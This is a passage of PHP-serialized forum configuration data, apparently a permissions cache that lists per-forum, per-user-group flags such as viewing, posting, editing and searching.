"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"848\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"849\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"444\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"850\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"851\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:84;a:11:{i:1;a:18:{s:3:\"pid\";s:3:\"831\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"832\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"833\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"834\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"835\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"836\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"837\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"838\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"839\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"840\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"841\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:61;a:13:{i:1;a:18:{s:3:\"pid\";s:3:\"501\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"502\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:9;a:18:{s:3:\"pid\";s:3:\"506\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"0\";}i:5;a:18:{s:3:\"pid\";s:3:\"503\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:6;a:18:{s:3:\"pid\";s:3:\"504\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:1:\"6\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"505\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"507\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"508\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"0\";}i:13;a:18:{s:3:\"pid\";s:3:\"509\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"1\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"510\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"511\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"662\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"778\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:66;a:12:{i:1;a:18:{s:3:\"pid\";s:3:\"371\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"372\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:9;a:18:{s:3:\"pid\";s:3:\"376\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"373\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:6;a:18:{s:3:\"pid\";s:3:\"374\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:1:\"6\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"375\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"377\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"378\";s:3:\"fid\";s:2: